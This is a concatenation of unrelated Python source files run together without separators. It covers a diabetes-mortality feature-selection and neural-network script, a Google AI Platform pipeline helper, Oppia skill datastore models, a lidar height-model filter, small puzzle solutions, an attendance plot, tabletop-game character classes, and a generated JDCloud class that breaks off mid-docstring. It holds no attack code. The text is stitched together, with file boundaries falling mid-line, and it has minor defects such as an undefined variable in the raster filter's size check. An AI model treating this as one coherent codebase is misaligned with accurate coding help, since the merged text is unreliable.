# Combine rows with same columns df_lf = df_lf.filter(['Feature', 'Label']) # Keep only selected columns df_lf = df_lf.set_index('Feature') # Set column as index df_lf = df_lf.transpose() # Switch rows and columns mrfractureproofswoodcarvings.remove('quant') # Remove outcome from 1st and 2nd layer regression feature list df_lmfpwc = df_lf[mrfractureproofswoodcarvings] # Save chosen featres as list df_lmfpwc = df_lmfpwc.transpose() # Switch rows and columns df_lmfpwc = df_lmfpwc.reset_index() # Reset index l_lmfpwc = list(zip(df_lmfpwc['Feature'], df_lmfpwc['Label'])) # Create list of variables alongside RFE value df_lmfpwc.info() # Get class, memory, and column info: names, data types, obs. ### Append step 7 results to corresponding text file text_file = open(path + name + "_" + day + ".txt", "a") # Open corresponding text file text_file.write(s7 + "\n\n") # Step description text_file.write(d1 + '\n') # Dataset description text_file.write(d2 + '\n') # Dataset description text_file.write(d3 + '\n\n') # Dataset description text_file.write('Target labels: quant = Diabetes Related (K00-K99) Raw Mortality Rate per 1000k' + '\n') # Target labels text_file.write('Target processing: None' + '\n\n') # Result description text_file.write(str(df_XY_f['quant'].describe()) + '\n\n') # Result summary text_file.write('Features labels: ACS Percent Estimates' + '\n') # Dataset methods description text_file.write('Feature processing: 75% nonNA, Median Imputed NA, Standard Scaled' + '\n\n') # Dataset methods description text_file.write('Rows, Columns: ' + str(df_XY_f.shape) + '\n\n') # Result description and result dataframe text_file.write("Models: " + m4 + "\n\n") # Model description text_file.write(str(res_f.summary()) + "\n\n") # Result summary text_file.write('Final List of selected 1st and 2nd layer features' + '\n') # Result description text_file.write(str(l_lmfpwc) + "\n\n") # Result list text_file.write("####################" + "\n\n") # Add section break for end of step text_file.close() # Close file ## Step 8: Predict Binary Outcome with Artificial Neural Networks s8 = 'Step 8: Predict Categorical targets with Artificial Neural Networks' m7 = 'Multi-Layer Perceptron' ### Create outcome table and define targets df_Y_f = df_XY_f.filter(['quant', 'ID']) # Create Outcome table df_Y_f['binary'] = np.where(df_Y_f['quant'] > df_Y_f['quant'].quantile(0.5), 1, 0) # Create binary outcome based on conditions df_Y_f = df_Y_f.set_index('ID') # Set identifier as index df_Y_f.info() # Get class, memory, and column info: names, data types, obs. ### Create standard scaled predictor table df_X_f = df_XY_f.drop(columns = ['quant', 'ID']) # Drop Unwanted Columns df_X_f = df_X_f.replace([np.inf, -np.inf], np.nan) # Replace infitite values with NA df_X_f = df_X_f.dropna(axis = 1, thresh = 0.75*len(df_X_f)) # Drop features less than 75% non-NA count for all columns df_X_f = pd.DataFrame(SimpleImputer(strategy = 'median').fit_transform(df_X_f), columns = df_X_f.columns) # Impute missing data df_X_f = pd.DataFrame(StandardScaler().fit_transform(df_X_f.values), columns = df_X_f.columns) # Standard scale values by converting the normalized features into a tabular format with the help of DataFrame. df_X_f['ID'] = df_XY_f['ID'] # Save ID as column in predictor table df_X_f = df_X_f.set_index('ID') # Set identifier as index df_X_f.info() # Get class, memory, and column info: names, data types, obs. ### Save FractureProof and Woodcarving feature list mrfractureproofscontemplativewoodcarvings = mrfractureproof + woodcarving # Combine 2nd layer slected features with first layer regression model features ### Multi-Layered Perceptron with all predictors from all layers Y = df_Y_f.filter(['binary']) # Save binary outcome as MLP Input X = df_X_f # Save all predictors as MLP input X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.50) # Random 50/50 Train/Test Split input = X.shape[1] # Save number of columns as input dimension nodes = round(input / 2) # Number of input dimensions divided by two for nodes in each layer epochs = 50 network = Sequential() # Build Network with keras Sequential API network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal', input_dim = input)) # First dense layer network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal')) # Second dense layer network.add(Dense(1, activation = 'sigmoid', kernel_initializer = 'random_normal')) # Output layer with binary activation network.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # Compile network with Adaptive moment estimation, and follow loss and accuracy final = network.fit(X_train, Y_train, batch_size = 10, epochs = epochs) # Fitting the data to the train outcome, with batch size and number of epochs Y_pred = network.predict(X_test) # Predict values from test data Y_pred = (Y_pred > 0.5) # Save predicted values close to 1 as boolean Y_test = (Y_test > 0.5) # Save test values close to 1 as boolean fpr, tpr, threshold = roc_curve(Y_test, Y_pred) # Create ROC outputs, true positive rate and false positive rate auc_a = auc(fpr, tpr) # Plot ROC and get AUC score e_a = epochs # Save epochs used for mlp print(auc_a) # Display object ### Multi-Layered Perceptron with Mr. Fracture Proof predictors Y = df_Y_f.filter(['binary']) # Save binary outcome as MLP Input X = df_X_f[mrfractureproof] # Save selected predictors from all layers predictors as MLP input X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.50) # Random 50/50 Train/Test Split input = X.shape[1] # Save number of columns as input dimension nodes = round(input / 2) # Number of input dimensions divided by two for nodes in each layer epochs = 500 network = Sequential() # Build Network with keras Sequential API network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal', input_dim = input)) # First dense layer network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal')) # Second dense layer network.add(Dense(1, activation = 'sigmoid', kernel_initializer = 'random_normal')) # Output layer with binary activation network.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # Compile network with Adaptive moment estimation, and follow loss and accuracy final = network.fit(X_train, Y_train, batch_size = 10, epochs = epochs) # Fitting the data to the train outcome, with batch size and number of epochs Y_pred = network.predict(X_test) # Predict values from test data Y_pred = (Y_pred > 0.5) # Save predicted values close to 1 as boolean Y_test = (Y_test > 0.5) # Save test values close to 1 as boolean fpr, tpr, threshold = roc_curve(Y_test, Y_pred) # Create ROC outputs, true positive rate and false positive rate auc_mrfp = auc(fpr, tpr) # Plot ROC and get AUC score e_mrfp = epochs # Save epochs used for mlp print(auc_mrfp) # Display object ### Multi-Layered Perceptron with Woodcarving predictors Y = df_Y_f.filter(['binary']) # Save binary outcome as MLP Input X = df_X_f[woodcarving] # Save selected predictors from all layers predictors as MLP input X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.50) # Random 50/50 Train/Test Split input = X.shape[1] # Save number of columns as input dimension nodes = round(input / 2) # Number of input dimensions divided by two for nodes in each layer epochs = 500 network = Sequential() # Build Network with keras Sequential API network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal', input_dim = input)) # First dense layer network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal')) # Second dense layer network.add(Dense(1, activation = 'sigmoid', kernel_initializer = 'random_normal')) # Output layer with binary activation network.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # Compile network with Adaptive moment estimation, and follow loss and accuracy final = network.fit(X_train, Y_train, batch_size = 10, epochs = epochs) # Fitting the data to the train outcome, with batch size and number of epochs Y_pred = network.predict(X_test) # Predict values from test data Y_pred = (Y_pred > 0.5) # Save predicted values close to 1 as boolean Y_test = (Y_test > 0.5) # Save test values close to 1 as boolean fpr, tpr, threshold = roc_curve(Y_test, Y_pred) # Create ROC outputs, true positive rate and false positive rate auc_wc = auc(fpr, tpr) # Plot ROC and get AUC score e_wc = epochs # Save epochs used for mlp print(auc_wc) # Display object ### Multi-Layered Perceptron with Mr. Fracture Proof's Contemplative Woodcarving predictors Y = df_Y_f.filter(['binary']) # Save binary outcome as MLP Input X = df_X_f[mrfractureproofscontemplativewoodcarvings] # Save selected predictors from all layers predictors as MLP input X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.50) # Random 50/50 Train/Test Split input = X.shape[1] # Save number of columns as input dimension nodes = round(input / 2) # Number of input dimensions divided by two for nodes in each layer epochs = 500 network = Sequential() # Build Network with keras Sequential API network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal', input_dim = input)) # First dense layer network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal')) # Second dense layer network.add(Dense(1, activation = 'sigmoid', kernel_initializer = 'random_normal')) # Output layer with binary activation network.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # Compile network with Adaptive moment estimation, and follow loss and accuracy final = network.fit(X_train, Y_train, batch_size = 10, epochs = epochs) # Fitting the data to the train outcome, with batch size and number of epochs Y_pred = network.predict(X_test) # Predict values from test data Y_pred = (Y_pred > 0.5) # Save predicted values close to 1 as boolean Y_test = (Y_test > 0.5) # Save test values close to 1 as boolean fpr, tpr, threshold = roc_curve(Y_test, Y_pred) # Create ROC outputs, true positive rate and false positive rate auc_mrfpctwc = auc(fpr, tpr) # Plot ROC and get AUC score e_mrfpctwc = epochs # Save epochs used for mlp print(auc_mrfpctwc) # Display object ### Append step 8 results to corresponding text file text_file = open(path + name + '_' + day + '.txt', 'a') # Open corresponding text file text_file.write(s8 + '\n\n') # Step description text_file.write(d1 + '\n') # Dataset description text_file.write(d2 + '\n') # Dataset description text_file.write(d3 + '\n\n') # Dataset description text_file.write('Target labels: binary = Diabetes Related (K00-K99) Raw Mortality Rate per 1000k above 50% percentile' + '\n') # Target labels text_file.write('Target processing: train, test random 50-50 split' + '\n\n') # Model methods description text_file.write(m7 + '\n') # Model description text_file.write('Layers: Dense, Dense, Activation' + '\n') # Model methods description text_file.write('Functions: ReLU, ReLU, Sigmoid' + '\n') # Model methods description text_file.write('All features, all layers: AUC = ' + str(auc_a) + ', Epochs = ' + str(e_a) + '\n') # Result description and result dataframe text_file.write('Fractureproof Features: AUC = ' + str(auc_mrfp) + ', Epochs = ' + str(e_mrfp) + '\n') # Result description and result dataframe text_file.write('Woodcarving Features: AUC = ' + str(auc_wc) + ', Epochs = ' + str(e_wc) + '\n') # Result description and result dataframe text_file.write('Mr. Fracture Proofs Woodcarving Features: AUC = ' + str(auc_mrfpctwc) + ', Epochs = ' + str(e_mrfpctwc) + '\n\n') # Result description and result dataframe text_file.write('Mr. Fracture Proofs Woodcarving Features, Final list:' + '\n\n') # Result description text_file.write('Mr. Fracture Proof (1st layer): ' + str(l_lmrfp) + '\n\n') # Result list text_file.write('Woodcarving (2nd layer): ' + str(l_lwc) + '\n\n') # Result list text_file.write('####################' + '\n\n') text_file.close() # Close file# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # def make_parent(parent: str) -> str: return parent def make_training_pipeline(display_name: str, dataset_id: str, model_display_name: str) -> google.cloud.aiplatform_v1alpha1.types.training_pipeline.TrainingPipeline: # Use sentiment_max of 4 training_task_inputs_dict = {"sentiment_max": 4} training_task_inputs = to_protobuf_value(training_task_inputs_dict) training_pipeline = { 'display_name': display_name, 'training_task_definition': "gs://google-cloud-aiplatform/schema/trainingjob/definition/automl_text_sentiment_1.0.0.yaml", 'training_task_inputs': training_task_inputs, 'input_data_config': { 'dataset_id': dataset_id }, 'model_to_upload': { 'display_name': model_display_name } } return training_pipeline core/storage/skill/gae_models.py # Copyright 2018 The Oppia Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Models for storing the skill data models.""" from __future__ import absolute_import # pylint: disable=import-only-modules from __future__ import unicode_literals # pylint: disable=import-only-modules from constants import constants from core.platform import models from google.appengine.datastore import datastore_query from google.appengine.ext import ndb (base_models, user_models,) = models.Registry.import_models([ models.NAMES.base_model, models.NAMES.user]) class SkillSnapshotMetadataModel(base_models.BaseSnapshotMetadataModel): """Storage model for the metadata for a skill snapshot.""" pass class SkillSnapshotContentModel(base_models.BaseSnapshotContentModel): """Storage model for the content of a skill snapshot.""" pass class SkillModel(base_models.VersionedModel): """Model for storing Skills. This class should only be imported by the skill services file and the skill model test file. """ SNAPSHOT_METADATA_CLASS = SkillSnapshotMetadataModel SNAPSHOT_CONTENT_CLASS = SkillSnapshotContentModel ALLOW_REVERT = False # The description of the skill. description = ndb.StringProperty(required=True, indexed=True) # The schema version for each of the misconception dicts. misconceptions_schema_version = ndb.IntegerProperty( required=True, indexed=True) # The schema version for each of the rubric dicts. rubric_schema_version = ndb.IntegerProperty( required=True, indexed=True) # A list of misconceptions associated with the skill, in which each # element is a dict. misconceptions = ndb.JsonProperty(repeated=True, indexed=False) # The rubrics for the skill that explain each difficulty level. rubrics = ndb.JsonProperty(repeated=True, indexed=False) # The ISO 639-1 code for the language this skill is written in. language_code = ndb.StringProperty(required=True, indexed=True) # The schema version for the skill_contents. skill_contents_schema_version = ndb.IntegerProperty( required=True, indexed=True) # A dict representing the skill contents. skill_contents = ndb.JsonProperty(indexed=False) # The prerequisite skills for the skill. prerequisite_skill_ids = ndb.StringProperty(repeated=True, indexed=False) # The id to be used by the next misconception added. next_misconception_id = ndb.IntegerProperty(required=True, indexed=False) # The id that the skill is merged into, in case the skill has been # marked as duplicate to another one and needs to be merged. # This is an optional field. superseding_skill_id = ndb.StringProperty(indexed=True) # A flag indicating whether deduplication is complete for this skill. # It will initially be False, and set to true only when there is a value # for superseding_skill_id and the merge was completed. all_questions_merged = ndb.BooleanProperty(indexed=True, required=True) @staticmethod def get_deletion_policy(): """Skill should be kept if it is published.""" return base_models.DELETION_POLICY.KEEP_IF_PUBLIC @classmethod def has_reference_to_user_id(cls, user_id): """Check whether SkillModel snapshots references the given user. Args: user_id: str. The ID of the user whose data should be checked. Returns: bool. Whether any models refer to the given user ID. """ return cls.SNAPSHOT_METADATA_CLASS.exists_for_user_id(user_id) @staticmethod def get_user_id_migration_policy(): """SkillModel doesn't have any field with user ID.""" return base_models.USER_ID_MIGRATION_POLICY.NOT_APPLICABLE @classmethod def get_merged_skills(cls): """Returns the skill models which have been merged. Returns: list(SkillModel). List of skill models which have been merged. """ return [skill for skill in cls.query() if ( skill.superseding_skill_id is not None and ( len(skill.superseding_skill_id) > 0))] def _trusted_commit( self, committer_id, commit_type, commit_message, commit_cmds): """Record the event to the commit log after the model commit. Note that this extends the superclass method. Args: committer_id: str. The user_id of the user who committed the change. commit_type: str. The type of commit. Possible values are in core.storage.base_models.COMMIT_TYPE_CHOICES. commit_message: str. The commit description message. commit_cmds: list(dict). A list of commands, describing changes made in this model, which should give sufficient information to reconstruct the commit. Each dict always contains: cmd: str. Unique command. and then additional arguments for that command. """ super(SkillModel, self)._trusted_commit( committer_id, commit_type, commit_message, commit_cmds) committer_user_settings_model = ( user_models.UserSettingsModel.get_by_id(committer_id)) committer_username = ( committer_user_settings_model.username if committer_user_settings_model else '') skill_commit_log_entry = SkillCommitLogEntryModel.create( self.id, self.version, committer_id, committer_username, commit_type, commit_message, commit_cmds, constants.ACTIVITY_STATUS_PUBLIC, False ) skill_commit_log_entry.skill_id = self.id skill_commit_log_entry.put() @staticmethod def get_export_policy(): """Model does not contain user data.""" return base_models.EXPORT_POLICY.NOT_APPLICABLE class SkillCommitLogEntryModel(base_models.BaseCommitLogEntryModel): """Log of commits to skills. A new instance of this model is created and saved every time a commit to SkillModel occurs. The id for this model is of the form 'skill-[skill_id]-[version]'. """ # The id of the skill being edited. skill_id = ndb.StringProperty(indexed=True, required=True) @staticmethod def get_deletion_policy(): """Skill commit log is deleted only if the corresponding collection is not public. """ return base_models.DELETION_POLICY.KEEP_IF_PUBLIC @classmethod def _get_instance_id(cls, skill_id, version): """This function returns the generated id for the get_commit function in the parent class. Args: skill_id: str. The id of the skill being edited. version: int. The version number of the skill after the commit. Returns: str. The commit id with the skill id and version number. """ return 'skill-%s-%s' % (skill_id, version) @staticmethod def get_export_policy(): """This model is only stored for archive purposes. The commit log of entities is not related to personal user data. """ return base_models.EXPORT_POLICY.NOT_APPLICABLE class SkillSummaryModel(base_models.BaseModel): """Summary model for an Oppia Skill. This should be used whenever the content blob of the skill is not needed (e.g. search results, etc). A SkillSummaryModel instance stores the following information: id, description, language_code, last_updated, created_on, version. The key of each instance is the skill id. """ # The description of the skill. description = ndb.StringProperty(required=True, indexed=True) # The number of misconceptions associated with the skill. misconception_count = ndb.IntegerProperty(required=True, indexed=True) # The number of worked examples in the skill. worked_examples_count = ndb.IntegerProperty(required=True, indexed=True) # The ISO 639-1 code for the language this skill is written in. language_code = ndb.StringProperty(required=True, indexed=True) # Time when the skill model was last updated (not to be # confused with last_updated, which is the time when the # skill *summary* model was last updated). skill_model_last_updated = ndb.DateTimeProperty(required=True, indexed=True) # Time when the skill model was created (not to be confused # with created_on, which is the time when the skill *summary* # model was created). skill_model_created_on = ndb.DateTimeProperty(required=True, indexed=True) version = ndb.IntegerProperty(required=True) @staticmethod def get_deletion_policy(): """Skill summary should be kept if associated skill is published.""" return base_models.DELETION_POLICY.KEEP_IF_PUBLIC @classmethod def has_reference_to_user_id(cls, unused_user_id): """Check whether SkillSummaryModel references the given user. Args: unused_user_id: str. The (unused) ID of the user whose data should be checked. Returns: bool. Whether any models refer to the given user ID. """ return False @staticmethod def get_export_policy(): """Model does not contain user data.""" return base_models.EXPORT_POLICY.NOT_APPLICABLE @staticmethod def get_user_id_migration_policy(): """SkillSummaryModel doesn't have any field with user ID.""" return base_models.USER_ID_MIGRATION_POLICY.NOT_APPLICABLE @classmethod def fetch_page(cls, page_size, urlsafe_start_cursor, sort_by): """Returns the models according to values specified. Args: page_size: int. Number of skills to fetch. urlsafe_start_cursor: str. The cursor to the next page. sort_by: str. A string indicating how to sort the result. Returns: 3-tuple(query_models, urlsafe_start_cursor, more). where: query_models: list(SkillSummary). The list of summaries of skills starting at the given cursor. urlsafe_start_cursor: str or None. A query cursor pointing to the next batch of results. If there are no more results, this might be None. more: bool. If True, there are (probably) more results after this batch. If False, there are no further results after this batch. """ cursor = datastore_query.Cursor(urlsafe=urlsafe_start_cursor) sort = -cls.skill_model_created_on if sort_by == ( constants.TOPIC_SKILL_DASHBOARD_SORT_OPTIONS[ 'DecreasingCreatedOn']): sort = cls.skill_model_created_on elif sort_by == ( constants.TOPIC_SKILL_DASHBOARD_SORT_OPTIONS[ 'IncreasingUpdatedOn']): sort = -cls.skill_model_last_updated elif sort_by == ( constants.TOPIC_SKILL_DASHBOARD_SORT_OPTIONS[ 'DecreasingUpdatedOn']): sort = cls.skill_model_last_updated query_models, next_cursor, more = ( cls.query().order(sort).fetch_page(page_size, start_cursor=cursor)) new_urlsafe_start_cursor = ( next_cursor.urlsafe() if (next_cursor and more) else None) return query_models, new_urlsafe_start_cursor, more rsjones94/riparian-idfilter_dhm.py import os os.environ['GDAL_DATA'] = os.environ['CONDA_PREFIX'] + r'\Library\share\gdal' os.environ['PROJ_LIB'] = os.environ['CONDA_PREFIX'] + r'\Library\share' import itertools import time from scipy import ndimage import ogr import gdal import numpy as np from skimage import measure def isolated_feature_filter(a): """ Removes isolated pixels. Meant to be used with a 3x3 window Args: a: the flattened form of an n x m numpy array Returns: either 0 or the pixel value """ edge_length = int(len(a) ** 0.5) b = a.reshape((edge_length, edge_length)) center = int((edge_length - 1) / 2) center_val = b[center, center] if center_val <= 0: # if the value is 0 we can just move on. If it's less than 0 (should not happen in a dhm) then repair it #print('Pixel is gucci') return 0 #print('Casting') #print(b) b = b > 0 # cast to Bools. If DHM is over 0, True #print(b) if not b.sum() > 1: # if there are no neighboring pixels with DHM over 0 #print('Removing') return 0 else: #print('Pixel passed muster') return center_val def density_filter(a, thresh=0.3): """ Only keep pixels if over thresh% of pixels in the window are > 0 Args: a: the flattened form of an n x m numpy array thresh: filtering threshold Returns: either 0 or the pixel value """ edge_length = int(len(a) ** 0.5) b = a.reshape((edge_length, edge_length)) center = int((edge_length - 1) / 2) center_val = b[center, center] if center_val <= 0: # if the value is 0 we can just move on. If it's less than 0 (should not happen in a dhm) then repair it return 0 b = b > 0 # cast to Bools. If DHM is over 0, True density = b.sum() / edge_length**2 if density >= thresh: return center_val else: return 0 def linear_feature_filter(a): """ Removes linear features based on the algorithm described in Characterizing urban surface cover and structure with airborne lidar technology , , , , and Args: a: the flattened form of an n x m numpy array Returns: either 0 or the pixel value """ edge_length = int(len(a) ** 0.5) b = a.reshape((edge_length, edge_length)) center = int((edge_length - 1) / 2) center_val = b[center, center] if center_val <= 0: # if the value is 0 we can just move on. If it's less than 0 (should not happen in a dhm) then repair it return 0 b = b > 0 # cast to Bools. If DHM is over 0, True # data = np.array([[x, y, b[x, y]] for x, y in coords if not np.isnan(b[x, y])]) # measure.profile_line # coords = itertools.product(range(edge_length), range(edge_length)) # all coordinates in the matrix start_coords = list(itertools.product([0], range(edge_length))) start_coords.extend(list(itertools.product(range(1, edge_length - 1), [edge_length - 1]))) end_coords = [(edge_length - 1 - a, edge_length - 1 - b) for a, b in start_coords] n_filled = b.sum() # total number of nonzero DHM cells i = 0 for start, end in zip(start_coords, end_coords): i += 1 intercepted = measure.profile_line(b, start, end, linewidth=1) n_intercepted = intercepted.sum() frac_filled_on_line = (n_intercepted / len(intercepted)) frac_filled_but_not_on_line = (n_filled - n_intercepted) / edge_length ** 2 # second part of conditional: are there a lot of points aligned linearly? # first part of conditional: are there not a lot of surrounding pixels? # if both are true, the feature is probably a powerline or building edge if frac_filled_but_not_on_line < 40/81 and frac_filled_on_line >= (3.5 / 9): print(f'FILTERING PT. N on line: {n_intercepted} out of {len(intercepted)}. {start}, {end}') print(f'Checked {i} lines, value squashed') return 0 #print(f'Checked {i} lines, value passed') return center_val def filter_dhm(dhm, out_file, filter_size=9, technique='density'): """ Remove linear and isolated pixels from a DHM Args: dhm: path to input digital height model out_file: output path filter_size: edge length of pixel. Must be odd and over 1. 9. Is preferred. Used only for linear feature detection; isolated pixel detection window locked at 3x3 technique: a string indicating the type method of feature removal. 'density' or 'linear' Returns: Nothing """ start = time.time() if filter_size % 2 != 1 and not filt_size > 1: raise Exception('Filter size must be odd and greater than 1') print(f'Removing erroneous features from DHM: {out_file}') print('Reading dhm') img = gdal.Open(dhm) ds = img.GetGeoTransform() ulx, xres, xskew, uly, yskew, yres = ds nx = img.RasterXSize ny = img.RasterYSize driver = gdal.GetDriverByName("GTiff") outdata = driver.Create(out_file, nx, ny, 1, gdal.GDT_Float32) outdata.SetGeoTransform(img.GetGeoTransform()) ##sets same geotransform as input outdata.SetProjection(img.GetProjection()) ##sets same projection as input in_band = img.GetRasterBand(1) in_array = in_band.ReadAsArray() dhm_nodata_val = in_band.GetNoDataValue() print(f'NoData: {dhm_nodata_val}') filtered_dhm = in_array if technique == 'linear': print('Removing isolated pixels') filtered_dhm = ndimage.filters.generic_filter(filtered_dhm, isolated_feature_filter, size=(3, 3)) for i in range(1): print(f'Removing linear features: {i+1}') filtered_dhm = ndimage.filters.generic_filter(filtered_dhm, linear_feature_filter, size=(filter_size, filter_size)) print('Removing isolated pixels... again') filtered_dhm = ndimage.filters.generic_filter(filtered_dhm, isolated_feature_filter, size=(3, 3)) elif technique == 'density': print('Applying density threshold') filtered_dhm = ndimage.filters.generic_filter(filtered_dhm, density_filter, size=(filter_size, filter_size), extra_keywords={'thresh': 0.3}) else: raise Exception(f'Technique must be "density" or "linear"') print('Writing') outdata.GetRasterBand(1).WriteArray(filtered_dhm) outdata.GetRasterBand(1).SetNoDataValue(dhm_nodata_val) ##if you want these values transparent outdata.FlushCache() ##saves to disk!! outdata = None band = None ds = None print('DHM processing complete') final = time.time() elap = round(final - start, 2) print(f'Processing time: {round(elap / 60, 2)} minutes') """ nums = [9] for i in nums: #dhm = r'F:\gen_model\texture_testing\dhm_mod\raw_dhm.tif' dhm = r'F:\gen_model\study_areas\100301011309\study_LiDAR\products\mosaic\dighe.tif' # is the DSM better? gives nice texture in foresty but single returny areas, though raisins are a problem filt_size = i out = f'F:\\gen_model\\texture_testing\\dhm_mod\\processed_dhm_filter{filt_size}.tif' filter_dhm(dhm, out, filter_size=filt_size, technique='density') """ #!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = "" __doc__ = r""" Created on 18-01-2021 """ import numpy from draugr.python_utilities.powers import next_pow_2 __all__ = ["zero_pad_to_power_2", "zero_pad_to"] def zero_pad_to(signal: numpy.ndarray, length: int) -> numpy.ndarray: """ """ return numpy.pad( signal, (0, length - len(signal)), "constant", constant_values=(0, 0) ) def zero_pad_to_power_2(signal: numpy.ndarray) -> numpy.ndarray: """ """ return zero_pad_to(signal, next_pow_2(len(signal))) if __name__ == "__main__": aasd = numpy.arange(8 + 1) print(aasd, aasd.shape) padded = zero_pad_to_power_2(aasd) print(padded, padded.shape) import unittest from typing import List import utils # O(n^2) time. O(n^2) space. DP. class Solution: def lenLongestFibSubseq(self, A: List[int]) -> int: result = 0 indexes = {x: i for i, x in enumerate(A)} # dp[i][j]: longest path ending in [i, j] dp = [[2] * len(A) for _ in range(len(A))] for k, z in enumerate(A): for j in range(k): y = A[j] x = z - y if x >= y: continue i = indexes.get(x, -1) if i == -1: continue dp[j][k] = dp[i][j] + 1 result = max(result, dp[j][k]) return result class Test(unittest.TestCase): def test(self): cases = utils.load_test_json(__file__).test_cases for case in cases: args = str(case.args) actual = Solution().lenLongestFibSubseq(**case.args.__dict__) self.assertEqual(case.expected, actual, msg=args) if __name__ == '__main__': unittest.main() top_twenty = ["zero", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten", "eleven", "twelve", "thirteen", "fourteen", "fifteen", "sixteen", "seventeen", "eighteen", "nineteen"] tens = ["", "", "twenty", "thirty", "forty", "fifty", "sixty", "seventy", "eighty", "ninety"] def num_digits(n): # check for if 0 <= n < 20: return top_twenty[n] elif 20 <= n < 100: return tens[n // 10] + (top_twenty[n % 10] if (n % 10 != 0) else "") elif 100 <= n < 1000: return top_twenty[n // 100] + "hundred" + (("and" + num_digits(n % 100)) if (n % 100 != 0) else "") elif 1000 <= n < 1000000: return num_digits(n // 1000) + "thousand" + (num_digits(n % 1000) if (n % 1000 != 0) else "") else: raise ValueError() if __name__ == "__main__": ans = sum(len(num_digits(i)) for i in range(1, 1001)) print(ans)app/attendance/attendance_histogram.py import datetime from pprint import pprint import matplotlib.pyplot as plt import pandas as pd from attendance.bosscontrol import load_attendance_time, load_employees def send_attendance_histogram(time_frame: int, date=datetime.datetime): collection = load_employees() load_attendance_time(collection, date) data = {'attendance_time': [], 'people': []} for item in collection.get_collection().values(): attendance = item.get_attendance() if attendance.is_absent(date): continue attendance.sort() data['attendance_time'].append(attendance.get_first(date)) data['attendance_time'].append(attendance.get_last(date)) data['people'].append(1) data['people'].append(1) if len(data['attendance_time']) == 0: return data['attendance_time'].insert(0, date.replace(hour=6, minute=0, second=0)) data['attendance_time'].append(date.replace(hour=23, minute=59, second=59)) data['people'].insert(0, 0) data['people'].append(0) data['attendance_time'].sort() df = pd.DataFrame.from_dict(data) df.index = df['attendance_time'] del df['attendance_time'] df_resample = df.resample("%iT" % time_frame) df_resample = df_resample.sum() df_resample.plot() plt.title('When you come to office') plt.xlabel('Time') plt.ylabel('People Amount') plt.grid(axis='x') pic = plt.savefig('figure1.pdf') t = 1 from math import floor class Entity(): def __init__(self, **attributes): self.ability = { "Strength": int(attributes['strength']), "Dexterity": int(attributes['dexterity']), "Constitution": int(attributes['constitution']), "Intelligence": int(attributes['intelligence']), "Wisdom": int(attributes['wisdom']), "Charisma": int(attributes['charisma']) } self.combat = { "Armor Class": int(attributes['armorclass']), "Hit Points": int(attributes['hitpoints']), "Max HP": int(attributes['maxhitpoints']), "Hit Dice": str(attributes['hitdice']), "Speed": int(attributes['speed']) } self.languages = attributes['language'] self.senses = { "Vision": str(), "Perception": int() } self.skills = list(attributes['skills']) def abilitymod(self, ability): return floor((ability -10) / 2) class Player(Entity): def __init__(self, attributes, **playerinfo): super().__init__(**attributes) self.name = str(playerinfo['name']) self.playerclass = playerinfo['class'] self.level = int(playerinfo['level']) self.race = str(playerinfo['race']) self.alignment = str(playerinfo['alignment']) self.experience = int(playerinfo['experience']) self.background = str(playerinfo['background']) self.combat['Weapons'] = dict(playerinfo['weapons']) self.features = list(playerinfo['features']) self.attacks = list(playerinfo['attacks']) self.spellslots = dict(playerinfo['spellslots']) self.currentslots = dict(playerinfo['currentslots']) self.spellsknown = dict(playerinfo['spellsknown']) self.gear = list(playerinfo['gear']) self.consumables = dict(playerinfo['consumables']) self.proficencybonus = int(playerinfo['proficiency']) self.senses['Perception'] = 10 + self.abilitymod(self.ability['Wisdom']) if 'Perception' in self.skills: self.senses['Perception'] = self.senses['Perception'] + self.proficencybonus class Monster(Entity): def __init__(self, attributes, **monsterinfo): super().__init__(**attributes) self.name = str(monsterinfo['name']) self.damageimmunities = list(monsterinfo['damageimmunities']) self.conditionimmuities = list(monsterinfo['conditionimmunities']) self.challenge = str(monsterinfo['challengerating']) self.xp = int(monsterinfo['xp']) self.traits = list(monsterinfo['traits']) self.combat['actions'] = dict(monsterinfo['actions']) self.senses['Perception'] = int(monsterinfo['perception']) 10-100 # coding=utf8 # Copyright 2018 JDCLOUD.COM # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # NOTE: This class is auto generated by the jdcloud code generator program. class SimpleBuild(object): def __init__(self, uuid=None, jobName=None, createdAt=None, compilerType=None, status=None, duration=None): """ :param uuid: (Optional) 构建任务的uuid :param jobName: (Optional) 